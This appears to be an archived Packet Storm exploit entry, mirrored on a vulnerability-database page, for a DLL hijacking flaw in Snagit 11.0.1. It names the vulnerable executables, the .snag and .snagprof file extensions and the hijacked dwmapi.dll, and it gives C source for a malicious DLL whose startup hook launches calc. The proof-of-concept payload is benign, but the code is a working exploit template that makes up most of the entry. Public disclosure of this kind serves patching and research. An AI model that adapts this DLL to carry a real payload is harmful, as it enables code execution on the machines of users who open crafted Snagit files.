Lucene search
K

Snagit 11.0.1 DLL Hijack

🗓️ 23 Aug 2012 00:00:00Reported by coolkavehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Snagit 11.0.1 DLL Hijack Vulnerabilit

Code
`Exploit Title: Snagit 11.0.1 (dwmapi.dll) DLL Hijacking Exploit   
Date: 2012-08-23  
Author: coolkaveh  
[email protected]  
Greets To Mohammad Morteza Sanaie  
[email protected]  
Https://twitter.com/coolkaveh  
Vendor Homepage: http://www.techsmith.com/  
Version: 11.0.1(build93)  
Tested on: windows XP Sp3 ENG   
---------------------------------------------------------   
# Vulnerable: Pixel Bender snagit32.exe & snagiteditor.exe  
---------------------------------------------------------  
# Vulnerable extensions: .snagprof & .snag  
---------------------------------------------------------  
# Vulnerable Dll: dwmapi.dll  
---------------------------------------------------------  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
DllExport void hook_startup() { exp(); }  
  
int exp()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation